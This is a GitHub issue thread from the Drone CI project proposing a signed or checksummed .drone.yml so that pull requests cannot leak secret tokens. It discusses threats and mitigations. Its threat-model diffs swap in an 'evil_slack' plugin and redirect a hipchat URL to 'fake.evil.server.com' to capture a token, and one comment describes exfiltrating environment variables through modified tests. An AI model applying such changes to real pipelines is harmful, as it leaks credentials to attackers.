### ISSUE TITLE
Signed Yaml File

### ISSUE THREAD

**Issue by bradrydzewski** [drone/drone#1189]
In the below example, the slack token is only injected into `slack` plugin container. This means that we can safely inject private variables into a build, even if the repository is public and even if the repository is a pull request.

```yaml
build:
  commands:
    - echo $slack_token # this won't work, we don't inject into the build
notify:
  slack:
    channel: dev
    token: $$slack_token
```

Because plugins execute in a separate container than the build, the build will never have access to secret variables meant for plugins. Plugins only run trusted commands and trusted code, therefore there is no concern that a plugin could ever leak a variable.

There is an attack vector, however, that we need to mitigate. We need to ensure a developer cannot submit a malicious pull request and swap the plugin with a malicious plugin. For example, image the below pull request:

```diff
notify:
- slack:
+ johnsmith/evil_slack:
    channel: dev
    token: $$slack_token
```

The above change would download `johnsmith/evil_slack` from the docker registry and execute. The `evil_slack` plugin would be given access to our slack token. The good news is that we have a way to mitigate such attach -- you can white-list plugins.

The problem is there is still another vector to consider. What happens if, instead of changing the plugin, someone swaps the secret variables:

```diff
notify:
  hipchat:
    channel: dev
    token: $$hipchat_token
+   url: fake.evil.server.com
```

In this case, the attacker has alters the hipchat URL (which is possible since Hipchat can run on-premise) and instructs the hipchat plugin use the API at `fake.evil.server.com`. This server will be able to extract the user's secret token, which is sent in the hipchat payload.

So, hopefully the problem is apparent ...

### Proposed Solution

The solution proposed by @benschumacher is that we provide the ability to sign the Yaml file. When Drone runs a build, we can check for a `.drone.sig` file. If the signature is invalid, meaning the Yaml file has changed, we can fail the build.

The signature should exclude the `build` section of the Yaml so that developers can submit pull requests that alter the build steps. Let's consider some examples:

This should not fail signature check, because the build section was changed, and the build section shouldn't be used for the signature:

```diff
build:
+ image: golang:1.5
- image: golang:1.4

notify:
  hipchat:
    channel: dev
    token: $$hipchat_token
```

The following change would fail signature check because it changes the notification section:

```diff
build:
  image: golang:1.4

notify:
  hipchat:
    channel: dev
    token: $$hipchat_token
+   url: fake.evil.server.com
```

The signature could be stored in a separate `.drone.sig` file, or could be stored directly in the Yaml file itself, and could be removed prior to calculating the signature.

Before implementing this solution, I'd love to hear feedback from the community regarding the approach and preferences (drone.sig vs inline in the yaml)

### Variation 1

Same concept, but slightly different implementation, is that we could include the signature AND the secure parameters in a `.drone.enc` file. For example

```sh
drone decrypt --out .drone.enc <<EOF
checksum: 9953ff2c905c3312bb76066e353
secrets:
  hipchat_token: super_duper_plaintext_secret
EOF
```

The above command would encrypted yaml file using similar approach discussed in #1145. The encrypted file would contain secrets and the checksum of the Yaml file. This `.drone.enc` could be fetched and decrypted at runtime.

The thing I like most about this approach is that secure variables need to be encrypted anyway. Why not encrypt a checksum of the file while we're at it? Combining the two seems like it will simplify things for the developer, while also encouraging signing the Yaml.

Question: what happens if a malicious pull request (to a public repo) uses the public key to encrypt an alternate `.drone.enc` file? They could change where a slack message is sent? They could change where a library is published? This will be an annoyance at most, but doesn't seem to pose a security threat. So I think this approach largely fills the biggest security challenge we have -- secure parameters in public repos that receive pull requests.

**Comment by tboerger** [comment]
Maybe it makes sense to enable or disable that per project. The idea sounds not bad.

**Comment by bradrydzewski** [comment]
@tboerger yes, signing the yaml would be optional. It would only be required if you use secure parameters. I added a second proposal above (see Variation 1) that combines the checksum with the secure parameter encryption.

**Comment by donny-dont** [comment]
There's a gotcha here. This assumes all your commands are in the yaml. I typically use a build.sh script as then a dev could just run that on their machine and that's referenced in the drone yml.

So maybe this should include the ability to sign a list of files rather than just the drone yml.

**Comment by donny-dont** [comment]
Actually the more that I think about it anything that can get at environment variables is potentially a way to pop out the values. Outside of something like browser tests you should be able to access environment variables in your programming language of choice so if you modify anything that runs within the build container, such as tests you should be able to print out the variables or even hit a server that uploads the variables. That makes this a really really hard problem to actually solve.

**Comment by tboerger** [comment]
How are the secured variables handled on travis? Maybe all of that is not worth it and just use the variables for pullrequests created by a list of trusted users?

**Comment by bradrydzewski** [comment]
@donny-dont I actually the variation of the proposed solution would actually solve this problem. You could do something like this in your Yaml to inject a secret into your build without having it echoed in the build:

```yaml
build:
  commands:
    - go build
    - go test
  environment:
    - coveralls_token=$$secret_token
```

In the above example, the environment variable is exported and would be available to any invoked shell scripts. We may still want to avoid injecting anything in the build section if it is a pull request, in which case the environment variable would just be empty. We would still inject variables into plugins, however, assuming the checksum matched. This means you could still publish reports to coveralls, for example.

**Comment by bradrydzewski** [comment]
@tboerger Travis does not inject secrets into pull requests, per the docs:

> The most important restriction for pull requests is about secure environment variables, or rather, any data that’s encrypted with our encryption feature.

Drone is architected differently than Travis due to its plugin model, so copying this approach would mean we cannot send notifications for pull requests. That means if you wanted email or slack notifications when a pull request completes it would not be possible. This will be a deal breaker for many teams.

I believe the proposed solution (with variation) solves this problem. If you include a checksum with your encrypted variables, and the Yaml matches that checksum, we can safely inject secrets into a pull requests (with the exception of the build section). This means you can send notifications or even publish coveralls reports for a pull request.

The checksum can be calculated with a single command on mac and linux:

```
$ shasum -a 256 .drone.yml
450bf79f647b52eefe82474f0ee2b57210ef823fb3c6fb0f7e0f2282064a58ca  .drone.yml
```

The return value is then encrypted along with the other secrets. Since you already need to encrypt secrets, calculating and encrypting the checksum is probably not that much extra work. It is just another encrypted string as far as the end user is concerned. It is also optional. If you don't calculate the checksum we simply won't inject variables into the public pull request.

**Comment by bradrydzewski** [comment]
I'm going to mark this as closed since its now documented, implemented and I've been using for a few days now. We can reopen if we find any issues with the approach or implementation.

You can find the docs here:
http://readme.drone.io/docs/build/#/secrets.md

**Comment by ralfschimmel** [comment]
This is really nice, but it not working for private repo's with PR's, the secrets are empty then.

Documentation is now here; http://readme.drone.io/usage/secrets/

This tells us;

> Pull Requests
> 
> Secret variables are not injected into to the build section of the .drone.yml if your repository is public and the build is a pull request. This is for security purposes to prevent a malicious pull request from leaking your secrets.

I feel like this is not correct for the current latest docker image.
